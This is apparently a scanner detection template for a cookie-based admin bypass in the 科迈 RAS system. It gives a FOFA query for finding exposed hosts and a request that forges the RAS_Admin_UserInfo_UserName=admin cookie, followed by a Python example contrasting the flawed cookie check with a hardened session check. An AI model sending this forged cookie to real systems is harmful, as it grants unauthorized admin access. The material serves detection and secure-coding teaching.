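Vulnerability description
The 科迈 RAS system has a cookie-validation authorization bypass: when the RAS_Admin_UserInfo_UserName cookie is set to admin, the admin backend can be accessed.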
fofa: app="科迈-RAS系统"
id: maike-ras-cookie-bypass

info:
  name: 科迈 RAS系统 Cookie验证越权漏洞
  author: zan8in
  severity: high
  description: |-
    科迈 RAS系统 存在Cookie验证越权,当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台
    fofa: app="科迈-RAS系统"
  tags: maike,ras,cookie-bypass
  created: 2025/03/27

rules:
  r0:
    request:
      method: GET
      path: /Server/CmxUser.php?pgid=UserList
      headers:
        Cookie: RAS_Admin_UserInfo_UserName=admin
    expression: response.status == 200 && response.body.bcontains(b'退出</A>') && response.body.bcontains(b'系统登录</A>') && response.body.bcontains(b'配置管理</A>')
expression: r0()
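
The flaw class described above, shown as an added example (not the product's code, which this page does not include): a check that trusts the RAS_Admin_UserInfo_UserName cookie, beside a hardened check that resolves identity from a server-side session. The RAS_SID cookie name, the SESSIONS table and all function names are hypothetical.

```python
import secrets
from http.cookies import SimpleCookie

# Hypothetical server-side session table: random session id -> username.
SESSIONS = {}


def parse_cookies(header):
    """Parse a raw Cookie request header into a plain dict."""
    jar = SimpleCookie()
    jar.load(header or "")
    return {name: morsel.value for name, morsel in jar.items()}


def is_admin_vulnerable(cookie_header):
    """Flawed pattern: the client-supplied username cookie is the identity."""
    cookies = parse_cookies(cookie_header)
    return cookies.get("RAS_Admin_UserInfo_UserName") == "admin"


def login(username):
    """Run only after a successful credential check; returns the session id."""
    sid = secrets.token_urlsafe(32)  # unguessable, generated by the server
    SESSIONS[sid] = username
    return sid


def is_admin_hardened(cookie_header):
    """Identity comes from the server-side session; the username cookie is
    treated as untrusted display data and never consulted."""
    sid = parse_cookies(cookie_header).get("RAS_SID", "")  # hypothetical name
    return SESSIONS.get(sid) == "admin"


def demo():
    # Constructed sample headers; the first is the header the template sends.
    forged = "RAS_Admin_UserInfo_UserName=admin"
    genuine = "RAS_SID=" + login("admin") + "; RAS_Admin_UserInfo_UserName=admin"
    spoofed = "RAS_SID=" + login("guest") + "; RAS_Admin_UserInfo_UserName=admin"
    return {
        "vulnerable_accepts_forged": is_admin_vulnerable(forged),
        "hardened_accepts_forged": is_admin_hardened(forged),
        "hardened_accepts_genuine": is_admin_hardened(genuine),
        "hardened_accepts_spoofed_name": is_admin_hardened(spoofed),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(check, result)
```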